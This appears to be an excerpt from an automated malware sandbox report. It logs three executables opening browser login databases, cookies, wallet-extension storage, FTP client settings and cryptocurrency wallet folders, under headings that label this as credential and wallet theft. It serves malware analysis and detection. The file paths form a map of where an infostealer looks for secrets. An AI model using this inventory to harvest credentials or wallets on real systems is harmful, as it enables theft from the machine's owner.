Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\QCFWYSKMHA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\GIGIYTFFYT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\LSBIHQFDVT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Directory queried: C:\Users\user\Documents\PWCCAWLGRE	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Directory queried: C:\Users\user\Documents
